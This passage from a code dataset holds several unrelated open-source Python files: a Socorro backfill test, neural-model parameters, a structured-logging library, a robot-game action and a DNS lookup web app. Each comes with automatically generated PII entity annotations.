'build_adu': { + 'params': { + ""update_day"": yesterday_str, + }, + 'res_expected': [(True,)], + }, + # Test backfill_correlations + 'correlations': { + 'params': { + ""update_day"": yesterday_str, + }, + 'res_expected': [(True,)], + }, + # Test backfill_crashes_by_user_build + 'crashes_by_user_build': { + 'params': { + ""update_day"": yesterday_str, + }, + 'res_expected': [(True,)], + }, + # Test backfill_crashes_by_user + 'crashes_by_user': { + 'params': { + ""update_day"": yesterday_str, + }, + 'res_expected': [(True,)], + }, + + # TODO: Test backfill_daily_crashes tries to insert into a table + # that does not exist. It can be fixed by creating a temporary one. + #'daily_crashes': { + # 'params': { + # ""update_day"": now_str, + # }, + # 'res_expected': [(True,)], + # }, + + # Test backfill_exploitability + 'exploitability': { + 'params': { + ""update_day"": yesterday_str, + }, + 'res_expected': [(True,)], + }, + # Test backfill_explosiveness + 'explosiveness': { + 'params': { + ""update_day"": yesterday_str, + }, + 'res_expected': [(True,)], + }, + # Test backfill_home_page_graph_build + 'home_page_graph_build': { + 'params': { + ""update_day"": yesterday_str, + }, + 'res_expected': [(True,)], + }, + # Test backfill_home_page_graph + 'home_page_graph': { + 'params': { + ""update_day"": yesterday_str, + }, + 'res_expected': [(True,)], + }, + # Test backfill_matviews + 'matviews': { + 'params': { + ""start_date"": yesterday_str, + ""reports_clean"": 'false', + }, + 'res_expected': [(True,)], + }, + # Test backfill_nightly_builds + 'nightly_builds': { + 'params': { + ""update_day"": yesterday_str, + }, + 'res_expected': [(True,)], + }, + # Test backfill_rank_compare + 'rank_compare': { + 'params': { + ""update_day"": yesterday_str, + }, + 'res_expected': [(True,)], + }, + # Test backfill_reports_clean + 'reports_clean': { + 'params': { + ""start_date"": yesterday_str, + ""end_date"": now_str, + }, + 'res_expected': [(True,)], + }, + + # TODO: Test backfill_reports_duplicates tries to insert into a + # table that does not exist. It can be fixed by using the update + # function inside of the backfill. + #'reports_duplicates': { + # 'params': { + # ""start_date"": yesterday_str, + # ""end_date"": now_str, + # }, + # 'res_expected': [(True,)], + # }, + + # TODO: Test backfill_signature_counts tries to insert into + # tables and to update functions that do not exist.
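+ # (the commented-out entry below is kept to document the intended + # params/res_expected shape for when that backfill is fixed)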
+ #'signature_counts': { + # 'params': { + # ""start_date"": yesterday_str, + # ""end_date"": now_str, + # }, + # 'res_expected': [(True,)], + # }, + + # Test backfill_tcbs_build + 'tcbs_build': { + 'params': { + ""update_day"": yesterday_str, + }, + 'res_expected': [(True,)], + }, + # Test backfill_tcbs + 'tcbs': { + 'params': { + ""update_day"": yesterday_str, + }, + 'res_expected': [(True,)], + }, + # Test backfill_weekly_report_partitions + 'weekly_report_partitions': { + 'params': { + ""start_date"": lastweek_str, + ""end_date"": now_str, + ""table_name"": 'raw_crashes', + }, + 'res_expected': [(True,)], + }, + # TODO: Update Backfill to support signature_summary backfill + # through the API + #'signature_summary_products': { + # 'params': { + # ""update_day"": yesterday_str, + # }, + # 'res_expected': [(True,)], + #}, + #'signature_summary_installations': { + # 'params': { + # ""update_day"": yesterday_str, + # }, + # 'res_expected': [(True,)], + #}, + #'signature_summary_uptime': { + # 'params': { + # ""update_day"": yesterday_str, + # }, + # 'res_expected': [(True,)], + #}, + #'signature_summary_os': { + # 'params': { + # ""update_day"": yesterday_str, + # }, + # 'res_expected': [(True,)], + #}, + #'signature_summary_process_type': { + # 'params': { + # ""update_day"": yesterday_str, + # }, + # 'res_expected': [(True,)], + #}, + #'signature_summary_architecture': { + # 'params': { + # ""update_day"": yesterday_str, + # }, + # 'res_expected': [(True,)], + #}, + #'signature_summary_flash_version': { + # 'params': { + # ""update_day"": yesterday_str, + # }, + # 'res_expected': [(True,)], + #}, + #'signature_summary_device': { + # 'params': { + # ""update_day"": yesterday_str, + # }, + # 'res_expected': [(True,)], + #}, + #'signature_summary_graphics': { + # 'params': { + # ""update_day"": yesterday_str, + # }, + # 'res_expected': [(True,)], + #}, + } + + #-------------------------------------------------------------------------- + def test_get(self): + + backfill = Backfill(config=self.config) + + #...................................................................... + # Test raise error if kind of backfill is not passed + params = {""backfill_type"": ''} + assert_raises(MissingArgumentError, backfill.get, **params) + + #...................................................................... 
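+ # Each entry of test_source_data is driven through backfill.get(**params) + # below; the first element of the result is compared to res_expected.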
+ # Test all the backfill functions + self.setup_data() + for test, data in self.test_source_data.items(): + data['params']['backfill_type'] = str(test) + res = backfill.get(**data['params']) + eq_(res[0], data['res_expected'][0]) +",12516,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['LOCATION', 'staticdata.tables'], ['PERSON', 'table.releases'], ['PERSON', 'adu'], ['PERSON', 'crashes_per_hour'], ['PERSON', 'adu'], ['PERSON', 'crashes_per_hour'], ['PERSON', 'table_columns ='], ['DATE_TIME', 'yesterday'], ['LOCATION', 'lastweek_str'], ['LOCATION', 'datetimeutil.date_to_string(lastweek'], ['PERSON', 'TODO'], ['PERSON', 'TODO'], ['LOCATION', 'lastweek_str'], ['PERSON', 'signature_summary_device'], ['URL', 'http://mozilla.org/MPL/2.0/.'], ['URL', 'nose.plugins.at'], ['URL', 'nose.to'], ['URL', 'socorro.external.postgresql.ba'], ['URL', 'socorro.li'], ['URL', 'self.connection.cu'], ['URL', 'socorro.external.postgresql.st'], ['URL', 'table.re'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'table.co'], ['URL', 'table.ge'], ['URL', 'columns.re'], ['URL', 'values.re'], ['URL', 'self.connection.com'], ['URL', 'self.connection.cu'], ['URL', 'tables.re'], ['URL', 'self.connection.com'], ['URL', 'self.connection.cl'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.co'], ['URL', 'backfill.ge'], ['URL', 'self.se'], ['URL', 'data.it'], ['URL', 'backfill.ge']]" +19,"# -*- coding: utf-8 -*- +# ----------------------------------------------------------------------------- +# Copyright (c) 2015, Nicolas P. Rougier +# Distributed under the (new) BSD License. +# +# Contributors: Nicolas P. Rougier (dummy@email.com) +# ----------------------------------------------------------------------------- + +# --- Time --- +ms = 0.001 +dt = 1*ms +tau = 10*ms + +# --- Learning --- +alpha_CUE = 0.050 +alpha_LTP = 0.002 +alpha_LTD = 0.001 + +# --- Sigmoid --- +Vmin = 0 +Vmax = 20 +Vh = 16 +Vc = 3 + +# --- Model --- +decision_threshold = 40 +noise = 0.001 +CTX_rest = -3.0 +STR_rest = 0.0 +STN_rest = -10.0 +GPI_rest = 10.0 +THL_rest = -40.0 + +# --- Cues & Rewards --- +V_cue = 7 +rewards = 3/3.,2/3.,1/3.,0/3. + +# -- Weight --- +Wmin = 0.25 +Wmax = 0.75 +gains = { ""CTX.cog -> STR.cog"" : +1.0, + ""CTX.mot -> STR.mot"" : +1.0, + ""CTX.ass -> STR.ass"" : +1.0, + ""CTX.cog -> STR.ass"" : +0.2, + ""CTX.mot -> STR.ass"" : +0.2, + ""CTX.cog -> STN.cog"" : +1.0, + ""CTX.mot -> STN.mot"" : +1.0, + ""STR.cog -> GPI.cog"" : -2.0, + ""STR.mot -> GPI.mot"" : -2.0, + ""STR.ass -> GPI.cog"" : -2.0, + ""STR.ass -> GPI.mot"" : -2.0, + ""STN.cog -> GPI.cog"" : +1.0, + ""STN.mot -> GPI.mot"" : +1.0, + ""GPI.cog -> THL.cog"" : -0.25, + ""GPI.mot -> THL.mot"" : -0.25, + + ""THL.cog -> CTX.cog"" : +0.4, + ""THL.mot -> CTX.mot"" : +0.4, + ""CTX.cog -> THL.cog"" : +0.1, + ""CTX.mot -> THL.mot"" : +0.1, + + ""CTX.mot -> CTX.mot"" : +0.5, + ""CTX.cog -> CTX.cog"" : +0.5, + ""CTX.ass -> CTX.ass"" : +0.5, + + ""CTX.ass -> CTX.cog"" : +0.01, + ""CTX.ass -> CTX.mot"" : +0.025, + ""CTX.cog -> CTX.ass"" : +0.025, + ""CTX.mot -> CTX.ass"" : +0.01, + } +",1837,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2015'], ['PERSON', 'Nicolas P. Rougier'], ['PERSON', 'Nicolas P. 
Rougier'], ['PERSON', 'Vmin'], ['PERSON', 'Vmax'], ['PERSON', 'Wmax'], ['URL', 'email.com'], ['URL', 'CTX.co'], ['URL', 'STR.co'], ['URL', 'CTX.mo'], ['URL', 'STR.mo'], ['URL', 'CTX.as'], ['URL', 'STR.as'], ['URL', 'CTX.co'], ['URL', 'STR.as'], ['URL', 'CTX.mo'], ['URL', 'STR.as'], ['URL', 'CTX.co'], ['URL', 'STN.co'], ['URL', 'CTX.mo'], ['URL', 'STN.mo'], ['URL', 'STR.co'], ['URL', 'GPI.co'], ['URL', 'STR.mo'], ['URL', 'GPI.mo'], ['URL', 'STR.as'], ['URL', 'GPI.co'], ['URL', 'STR.as'], ['URL', 'GPI.mo'], ['URL', 'STN.co'], ['URL', 'GPI.co'], ['URL', 'STN.mo'], ['URL', 'GPI.mo'], ['URL', 'GPI.co'], ['URL', 'THL.co'], ['URL', 'GPI.mo'], ['URL', 'THL.mo'], ['URL', 'THL.co'], ['URL', 'CTX.co'], ['URL', 'THL.mo'], ['URL', 'CTX.mo'], ['URL', 'CTX.co'], ['URL', 'THL.co'], ['URL', 'CTX.mo'], ['URL', 'THL.mo'], ['URL', 'CTX.mo'], ['URL', 'CTX.mo'], ['URL', 'CTX.co'], ['URL', 'CTX.co'], ['URL', 'CTX.as'], ['URL', 'CTX.as'], ['URL', 'CTX.as'], ['URL', 'CTX.co'], ['URL', 'CTX.as'], ['URL', 'CTX.mo'], ['URL', 'CTX.co'], ['URL', 'CTX.as'], ['URL', 'CTX.mo'], ['URL', 'CTX.as']]" +20,"# encoding: utf-8 +# +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this file, +# You can obtain one at http://mozilla.org/MPL/2.0/. +# +# Contact: Kyle Lahnakoski (dummy@email.com) +# +from __future__ import absolute_import, division, unicode_literals + +import os +import platform +import sys +from datetime import datetime + +from mo_dots import Data, FlatList, coalesce, is_data, is_list, listwrap, unwraplist, wrap +from mo_future import PY3, is_text, text +from mo_logs import constants, exceptions, strings +from mo_logs.exceptions import Except, LogItem, suppress_exception +from mo_logs.strings import CR, indent + +_Thread = None +if PY3: + STDOUT = sys.stdout.buffer +else: + STDOUT = sys.stdout + + +class Log(object): + """""" + FOR STRUCTURED LOGGING AND EXCEPTION CHAINING + """""" + trace = False + main_log = None + logging_multi = None + profiler = None # simple pypy-friendly profiler + error_mode = False # prevent error loops + + @classmethod + def start(cls, settings=None): + """""" + RUN ME FIRST TO SETUP THE THREADED LOGGING + http://victorlin.me/2012/08/good-logging-practice-in-python/ + + log - LIST OF PARAMETERS FOR LOGGER(S) + trace - SHOW MORE DETAILS IN EVERY LOG LINE (default False) + cprofile - True==ENABLE THE C-PROFILER THAT COMES WITH PYTHON (default False) + USE THE LONG FORM TO SET THE FILENAME {""enabled"": True, ""filename"": ""cprofile.tab""} + profile - True==ENABLE pyLibrary SIMPLE PROFILING (default False) (eg with Profiler(""some description""):) + USE THE LONG FORM TO SET FILENAME {""enabled"": True, ""filename"": ""profile.tab""} + constants - UPDATE MODULE CONSTANTS AT STARTUP (PRIMARILY INTENDED TO CHANGE DEBUG STATE) + """""" + global _Thread + if not settings: + return + settings = wrap(settings) + + Log.stop() + + cls.settings = settings + cls.trace = coalesce(settings.trace, False) + if cls.trace: + from mo_threads import Thread as _Thread + _ = _Thread + + # ENABLE CPROFILE + if settings.cprofile is False: + settings.cprofile = {""enabled"": False} + elif settings.cprofile is True: + if isinstance(settings.cprofile, bool): + settings.cprofile = {""enabled"": True, ""filename"": ""cprofile.tab""} + if settings.cprofile.enabled: + from mo_threads import profiles + profiles.enable_profilers(settings.cprofile.filename) + + if settings.profile is True or (is_data(settings.profile) and 
settings.profile.enabled): + Log.error(""REMOVED 2018-09-02, Activedata revision 3f30ff46f5971776f8ba18"") + # from mo_logs import profiles + # + # if isinstance(settings.profile, bool): + # profiles.ON = True + # settings.profile = {""enabled"": True, ""filename"": ""profile.tab""} + # + # if settings.profile.enabled: + # profiles.ON = True + + if settings.constants: + constants.set(settings.constants) + + logs = coalesce(settings.log, settings.logs) + if logs: + cls.logging_multi = StructuredLogger_usingMulti() + for log in listwrap(logs): + Log.add_log(Log.new_instance(log)) + + from mo_logs.log_usingThread import StructuredLogger_usingThread + cls.main_log = StructuredLogger_usingThread(cls.logging_multi) + + @classmethod + def stop(cls): + """""" + DECONSTRUCTS ANY LOGGING, AND RETURNS TO DIRECT-TO-stdout LOGGING + EXECUTING MULTIPLE TIMES IN A ROW IS SAFE, IT HAS NO NET EFFECT, IT STILL LOGS TO stdout + :return: NOTHING + """""" + main_log, cls.main_log = cls.main_log, StructuredLogger_usingStream(STDOUT) + main_log.stop() + + @classmethod + def new_instance(cls, settings): + settings = wrap(settings) + + if settings[""class""]: + if settings[""class""].startswith(""logging.handlers.""): + from mo_logs.log_usingHandler import StructuredLogger_usingHandler + + return StructuredLogger_usingHandler(settings) + else: + with suppress_exception: + from mo_logs.log_usingLogger import make_log_from_settings + + return make_log_from_settings(settings) + # OH WELL :( + + if settings.log_type == ""logger"": + from mo_logs.log_usingLogger import StructuredLogger_usingLogger + return StructuredLogger_usingLogger(settings) + if settings.log_type == ""file"" or settings.file: + return StructuredLogger_usingFile(settings.file) + if settings.log_type == ""file"" or settings.filename: + return StructuredLogger_usingFile(settings.filename) + if settings.log_type == ""console"": + from mo_logs.log_usingThreadedStream import StructuredLogger_usingThreadedStream + return StructuredLogger_usingThreadedStream(STDOUT) + if settings.log_type == ""mozlog"": + from mo_logs.log_usingMozLog import StructuredLogger_usingMozLog + return StructuredLogger_usingMozLog(STDOUT, coalesce(settings.app_name, settings.appname)) + if settings.log_type == ""stream"" or settings.stream: + from mo_logs.log_usingThreadedStream import StructuredLogger_usingThreadedStream + return StructuredLogger_usingThreadedStream(settings.stream) + if settings.log_type == ""elasticsearch"" or settings.stream: + from mo_logs.log_usingElasticSearch import StructuredLogger_usingElasticSearch + return StructuredLogger_usingElasticSearch(settings) + if settings.log_type == ""email"": + from mo_logs.log_usingEmail import StructuredLogger_usingEmail + return StructuredLogger_usingEmail(settings) + if settings.log_type == ""ses"": + from mo_logs.log_usingSES import StructuredLogger_usingSES + return StructuredLogger_usingSES(settings) + if settings.log_type.lower() in [""nothing"", ""none"", ""null""]: + from mo_logs.log_usingNothing import StructuredLogger + return StructuredLogger() + + Log.error(""Log type of {{log_type|quote}} is not recognized"", log_type=settings.log_type) + + @classmethod + def add_log(cls, log): + cls.logging_multi.add_log(log) + + @classmethod + def note( + cls, + template, + default_params={}, + stack_depth=0, + log_context=None, + **more_params + ): + """""" + :param template: *string* human readable string with placeholders for parameters + :param default_params: *dict* parameters to fill in template + :param stack_depth:
*int* how many calls you want popped off the stack to report the *true* caller + :param log_context: *dict* extra key:value pairs for your convenience + :param more_params: *any more parameters (which will overwrite default_params) + :return: + """""" + timestamp = datetime.utcnow() + if not is_text(template): + Log.error(""Log.note was expecting a unicode template"") + + Log._annotate( + LogItem( + context=exceptions.NOTE, + format=template, + template=template, + params=dict(default_params, **more_params) + ), + timestamp, + stack_depth+1 + ) + + @classmethod + def unexpected( + cls, + template, + default_params={}, + cause=None, + stack_depth=0, + log_context=None, + **more_params + ): + """""" + :param template: *string* human readable string with placeholders for parameters + :param default_params: *dict* parameters to fill in template + :param cause: *Exception* for chaining + :param stack_depth: *int* how many calls you want popped off the stack to report the *true* caller + :param log_context: *dict* extra key:value pairs for your convenience + :param more_params: *any more parameters (which will overwrite default_params) + :return: + """""" + timestamp = datetime.utcnow() + if not is_text(template): + Log.error(""Log.warning was expecting a unicode template"") + + if isinstance(default_params, BaseException): + cause = default_params + default_params = {} + + if ""values"" in more_params.keys(): + Log.error(""Can not handle a logging parameter by name `values`"") + + params = Data(dict(default_params, **more_params)) + cause = unwraplist([Except.wrap(c) for c in listwrap(cause)]) + trace = exceptions.get_stacktrace(stack_depth + 1) + + e = Except(exceptions.UNEXPECTED, template=template, params=params, cause=cause, trace=trace) + Log._annotate( + e, + timestamp, + stack_depth+1 + ) + + @classmethod + def alarm( + cls, + template, + default_params={}, + stack_depth=0, + log_context=None, + **more_params + ): + """""" + :param template: *string* human readable string with placeholders for parameters + :param default_params: *dict* parameters to fill in template + :param stack_depth: *int* how many calls you want popped off the stack to report the *true* caller + :param log_context: *dict* extra key:value pairs for your convenience + :param more_params: more parameters (which will overwrite default_params) + :return: + """""" + timestamp = datetime.utcnow() + format = (""*"" * 80) + CR + indent(template, prefix=""** "").strip() + CR + (""*"" * 80) + Log._annotate( + LogItem( + context=exceptions.ALARM, + format=format, + template=template, + params=dict(default_params, **more_params) + ), + timestamp, + stack_depth + 1 + ) + + alert = alarm + + @classmethod + def warning( + cls, + template, + default_params={}, + cause=None, + stack_depth=0, + log_context=None, + **more_params + ): + """""" + :param template: *string* human readable string with placeholders for parameters + :param default_params: *dict* parameters to fill in template + :param cause: *Exception* for chaining + :param stack_depth: *int* how many calls you want popped off the stack to report the *true* caller + :param log_context: *dict* extra key:value pairs for your convenience + :param more_params: *any more parameters (which will overwrite default_params) + :return: + """""" + timestamp = datetime.utcnow() + if not is_text(template): + Log.error(""Log.warning was expecting a unicode template"") + + if isinstance(default_params, BaseException): + cause = default_params + default_params = {} + + if ""values"" in 
more_params.keys(): + Log.error(""Can not handle a logging parameter by name `values`"") + + params = Data(dict(default_params, **more_params)) + cause = unwraplist([Except.wrap(c) for c in listwrap(cause)]) + trace = exceptions.get_stacktrace(stack_depth + 1) + + e = Except(exceptions.WARNING, template=template, params=params, cause=cause, trace=trace) + Log._annotate( + e, + timestamp, + stack_depth+1 + ) + + @classmethod + def error( + cls, + template, # human readable template + default_params={}, # parameters for template + cause=None, # plausible cause + stack_depth=0, + **more_params + ): + """""" + raise an exception with a trace for the cause too + + :param template: *string* human readable string with placeholders for parameters + :param default_params: *dict* parameters to fill in template + :param cause: *Exception* for chaining + :param stack_depth: *int* how many calls you want popped off the stack to report the *true* caller + :param log_context: *dict* extra key:value pairs for your convenience + :param more_params: *any more parameters (which will overwrite default_params) + :return: + """""" + if not is_text(template): + sys.stderr.write(str(""Log.error was expecting a unicode template"")) + Log.error(""Log.error was expecting a unicode template"") + + if default_params and isinstance(listwrap(default_params)[0], BaseException): + cause = default_params + default_params = {} + + params = Data(dict(default_params, **more_params)) + + add_to_trace = False + if cause == None: + causes = None + elif is_list(cause): + causes = [] + for c in listwrap(cause): # CAN NOT USE LIST-COMPREHENSION IN PYTHON3 (EXTRA STACK DEPTH FROM THE IN-LINED GENERATOR) + causes.append(Except.wrap(c, stack_depth=1)) + causes = FlatList(causes) + elif isinstance(cause, BaseException): + causes = Except.wrap(cause, stack_depth=1) + else: + causes = None + Log.error(""can only accept Exception, or list of exceptions"") + + trace = exceptions.get_stacktrace(stack_depth + 1) + + if add_to_trace: + cause[0].trace.extend(trace[1:]) + + e = Except(context=exceptions.ERROR, template=template, params=params, cause=causes, trace=trace) + raise_from_none(e) + + @classmethod + def _annotate( + cls, + item, + timestamp, + stack_depth + ): + """""" + :param item: A LogItem, THE TYPE OF MESSAGE + :param stack_depth: FOR TRACKING WHAT LINE THIS CAME FROM + :return: + """""" + item.timestamp = timestamp + item.machine = machine_metadata + item.template = strings.limit(item.template, 10000) + + item.format = strings.limit(item.format, 10000) + if item.format == None: + format = text(item) + else: + format = item.format.replace(""{{"", ""{{params."") + if not format.startswith(CR) and format.find(CR) > -1: + format = CR + format + + if cls.trace: + log_format = item.format = ""{{machine.name}} (pid {{machine.pid}}) - {{timestamp|datetime}} - {{thread.name}} - \""{{location.file}}:{{location.line}}\"" - ({{location.method}}) - "" + format + f = sys._getframe(stack_depth + 1) + item.location = { + ""line"": f.f_lineno, + ""file"": text(f.f_code.co_filename), + ""method"": text(f.f_code.co_name) + } + thread = _Thread.current() + item.thread = {""name"": thread.name, ""id"": thread.id} + else: + log_format = item.format = ""{{timestamp|datetime}} - "" + format + + cls.main_log.write(log_format, item.__data__()) + + def write(self): + raise NotImplementedError + + +def _same_frame(frameA, frameB): + return (frameA.line, frameA.file) == (frameB.line, frameB.file) + + +# GET THE MACHINE METADATA +machine_metadata = wrap({
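+ # Captured once at import time; Log._annotate() stamps this dict onto + # every log item as item.machine.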
""pid"": os.getpid(), + ""python"": text(platform.python_implementation()), + ""os"": text(platform.system() + platform.release()).strip(), + ""name"": text(platform.node()) +}) + + +def raise_from_none(e): + raise e + +if PY3: + exec(""def raise_from_none(e):\n raise e from None\n"", globals(), locals()) + + +from mo_logs.log_usingFile import StructuredLogger_usingFile +from mo_logs.log_usingMulti import StructuredLogger_usingMulti +from mo_logs.log_usingStream import StructuredLogger_usingStream + + +if not Log.main_log: + Log.main_log = StructuredLogger_usingStream(STDOUT) + +",15833,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Kyle Lahnakoski'], ['NRP', 'FlatList'], ['PERSON', 'LogItem'], ['PERSON', 'cprofile - True==ENABLE'], ['DATE_TIME', '2018-09-02'], ['PERSON', 'mo_logs.log_usingThread'], ['LOCATION', 'main_log'], ['NRP', 'mo_logs.log_usingLogger'], ['LOCATION', 'OH'], ['PERSON', 'LogItem'], ['PERSON', 'LogItem'], ['NRP', 'Log.error(""can'], ['PERSON', 'format.find(CR'], ['PERSON', 'same_frame(frameA'], ['URL', 'http://mozilla.org/MPL/2.0/.'], ['URL', 'http://victorlin.me/2012/08/good-logging-practice-in-python/'], ['URL', 'email.com'], ['URL', 'logs.st'], ['URL', 'sys.st'], ['URL', 'sys.st'], ['URL', 'Log.st'], ['URL', 'cls.se'], ['URL', 'cls.tr'], ['URL', 'settings.tr'], ['URL', 'cls.tr'], ['URL', 'settings.cprofile.fi'], ['URL', 'settings.pro'], ['URL', 'settings.pro'], ['URL', 'settings.pro'], ['URL', 'Log.er'], ['URL', 'settings.pro'], ['URL', 'settings.pro'], ['URL', 'settings.pro'], ['URL', 'settings.co'], ['URL', 'constants.se'], ['URL', 'settings.co'], ['URL', 'Log.ad'], ['URL', 'Log.ne'], ['URL', 'cls.ma'], ['URL', 'cls.ma'], ['URL', 'cls.ma'], ['URL', 'log.st'], ['URL', 'settings.fi'], ['URL', 'settings.fi'], ['URL', 'settings.fi'], ['URL', 'settings.fi'], ['URL', 'settings.st'], ['URL', 'settings.st'], ['URL', 'settings.st'], ['URL', 'Log.er'], ['URL', 'multi.ad'], ['URL', 'Log.er'], ['URL', 'Log.no'], ['URL', 'exceptions.NO'], ['URL', 'Log.er'], ['URL', 'params.ke'], ['URL', 'Log.er'], ['URL', 'exceptions.ge'], ['URL', 'exceptions.AL'], ['URL', 'Log.er'], ['URL', 'params.ke'], ['URL', 'Log.er'], ['URL', 'exceptions.ge'], ['URL', 'sys.st'], ['URL', 'Log.er'], ['URL', 'Log.er'], ['URL', 'Log.er'], ['URL', 'Log.er'], ['URL', 'exceptions.ge'], ['URL', 'exceptions.ER'], ['URL', 'item.ma'], ['URL', 'strings.li'], ['URL', 'item.fo'], ['URL', 'strings.li'], ['URL', 'item.fo'], ['URL', 'item.fo'], ['URL', 'item.format.re'], ['URL', 'format.st'], ['URL', 'format.fi'], ['URL', 'cls.tr'], ['URL', 'item.fo'], ['URL', 'machine.na'], ['URL', 'thread.na'], ['URL', 'location.fi'], ['URL', 'location.li'], ['URL', 'location.me'], ['URL', 'code.co'], ['URL', 'code.co'], ['URL', 'Thread.cu'], ['URL', 'item.th'], ['URL', 'thread.na'], ['URL', 'thread.id'], ['URL', 'item.fo'], ['URL', 'cls.ma'], ['URL', 'frameA.li'], ['URL', 'frameA.fi'], ['URL', 'frameB.li'], ['URL', 'frameB.fi'], ['URL', 'os.ge'], ['URL', 'platform.py'], ['URL', 'platform.sy'], ['URL', 'platform.re'], ['URL', 'platform.no'], ['URL', 'Log.ma'], ['URL', 'Log.ma']]" +21,"# This file is part of Beneath a Binary Sky. +# Copyright (C) 2016, Aidin Gharibnavaz dummy@email.com +# +# Beneath a Binary Sky is free software: you can redistribute it and/or +# modify it under the terms of the GNU General Public License as +# published by the Free Software Foundation, either version 3 of the +# License, or (at your option) any later version. 
+# +# Beneath a Binary Sky is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with Beneath a Binary Sky. If not, see +# <http://www.gnu.org/licenses/>. + +import time + +from actions.action import Action +from actions.exceptions import InvalidArgumentsError, RobotHaveNoWaterError +from world.world import World +from database.exceptions import LockAlreadyAquiredError + + +class WaterAction(Action): + + def __init__(self): + super().__init__() + + self._world = World() + + def do_action(self, robot, args): + '''Waters the square robot stands on. + + @param robot: Instance of `objects.robot.Robot'. + ''' + if len(args) != 1: + raise InvalidArgumentsError(""`water' action takes no arguments."") + + if not robot.get_has_water(): + raise RobotHaveNoWaterError(""Robot does not carry water."") + + try: + square = self._world.get_square(robot.get_location(), for_update=True) + except LockAlreadyAquiredError: + # Waiting a little, and trying one more time. + time.sleep(0.02) + square = self._world.get_square(robot.get_location(), for_update=True) + + # Note: we don't raise an exception if there's no plant. A robot can waste its water. + plant = square.get_plant() + if plant is not None: + plant.set_water_level(100) + robot.set_honor(robot.get_honor() + 1) + + robot.set_has_water(False) +",2047,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2016'], ['PERSON', 'Aidin Gharibnavaz'], ['DATE_TIME', 'RobotHaveNoWaterError(""Robot'], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'email.com'], ['URL', 'actions.ac'], ['URL', 'objects.robot.Ro'], ['URL', 'robot.ge'], ['URL', 'world.ge'], ['URL', 'robot.ge'], ['URL', 'time.sl'], ['URL', 'world.ge'], ['URL', 'robot.ge'], ['URL', 'square.ge'], ['URL', 'plant.se'], ['URL', 'robot.se'], ['URL', 'robot.ge'], ['URL', 'robot.se']]" +22,"#!/usr/bin/env python3 + +import os, logging, argparse, json, datetime +import requests +import dns.resolver +from bottle import route, request, response, redirect, hook, error, default_app, view, static_file, template + +def set_content_type(fn): + def _return_type(*args, **kwargs): + if request.headers.get('Accept') == ""application/json"": + response.headers['Content-Type'] = 'application/json' + if request.headers.get('Accept') == ""text/plain"": + response.headers['Content-Type'] = 'text/plain' + if request.method != 'OPTIONS': + return fn(*args, **kwargs) + return _return_type + +def enable_cors(fn): + def _enable_cors(*args, **kwargs): + response.headers['Access-Control-Allow-Origin'] = '*' + response.headers['Access-Control-Allow-Methods'] = 'GET, POST, PUT, OPTIONS' + response.headers['Access-Control-Allow-Headers'] = 'Origin, Accept, Content-Type, X-Requested-With, X-CSRF-Token' + + if request.method != 'OPTIONS': + return fn(*args, **kwargs) + return _enable_cors + +def resolveDomain(domain, recordType, args): + records = [] + + if args.doh: + try: + payload = { + 'name': domain, + 'type': recordType + } + data = requests.get(""{}"".format(args.resolver), params=payload) + for rec in data.json()['Answer']: + records.append(rec['data']) + except: + return records + return records + else: + try: + resolver = dns.resolver.Resolver() + resolver.nameservers = args.resolver.split(',') + + if recordType in args.records.split(','): + lookup = resolver.resolve(domain, recordType) + for data in 
lookup: + if recordType in ['A', 'AAAA']: + records.append(data.address) + elif recordType in ['TXT']: + for rec in data.strings: + records.append(rec.decode(""utf-8"").replace('""', '').strip()) + else: + records.append(str(data).replace('""', '').strip()) + return records + except dns.resolver.NXDOMAIN: + return records + except dns.resolver.NoAnswer: + return records + except dns.exception.Timeout: + return records + except dns.resolver.NoNameservers: + return records + +@error('404') +@error('403') +def returnError(code, msg, contentType=""text/plain""): + response.status = int(code) + response.content_type = contentType + return template('error') + +@route('/static/<filepath:path>') +def static(filepath): + return static_file(filepath, root='views/static') + +@route('/servers') +def servers(): + try: + response.content_type = 'text/plain' + return ""\r\n"".join(args.resolver.split("","")) + except: + return ""Unable to open servers file."" + +@route('/version') +def version(): + try: + dirname, filename = os.path.split(os.path.abspath(__file__)) + del filename + f = open(os.getenv('VERSION_PATH', dirname + '/.git/refs/heads/master'), 'r') + content = f.read() + response.content_type = 'text/plain' + return content + except: + return ""Unable to open version file."" + +@route('/<record>') +def route_redirect(record): + return redirect(""/{}/A"".format(record)) + +@route('/<record>/<type>') +@route('/<record>/<type>.<ext>') +@set_content_type +@enable_cors +def loadRecord(record, type='A', ext='html'): + try: + if record == """": + raise ValueError + if not ext in [""html"",""txt"", ""text"", ""json""]: + raise ValueError + if not type.upper() in args.records.split(','): + raise ValueError + except ValueError: + return returnError(404, ""Not Found"", ""text/html"") + + if ext in [""json""]: + response.content_type = 'application/json' + if ext in [""txt"", ""text""]: + response.content_type = 'text/plain' + + # We make a request to get information + data = resolveDomain(record, type.upper(), args) + + if response.content_type == 'application/json': + return json.dumps({ + 'results': { + 'name': record, + 'type': type.upper(), + 'records': data, + } + }) + elif response.content_type == ""text/plain"": + return ""\r\n"".join(data) + else: + return template('rec', { + 'name': record, + 'type': type.upper(), + 'records': data, + 'recTypes': args.records.split(',') + }) + +@route('/', ('GET', 'POST')) +def index(): + + if request.method == ""POST"": + recordName = request.forms.get('recordName', '') + recordType = request.forms.get('recordType', '') + + if recordName != '' and recordType in args.records.split(','): + return redirect(""/{}/{}"".format(recordName, recordType)) + else: + return returnError(404, ""We were not able to figure out what you were asking for"", ""text/html"") + + return template(""home"", { + 'recTypes': args.records.split(',') + }) + +if __name__ == '__main__': + + parser = argparse.ArgumentParser() + + # Server settings + parser.add_argument(""-i"", ""--host"", default=os.getenv('HOST', '127.0.0.1'), help=""server ip"") + parser.add_argument(""-p"", ""--port"", default=os.getenv('PORT', 5000), help=""server port"") + + # Redis settings + parser.add_argument(""--redis"", default=os.getenv('REDIS', 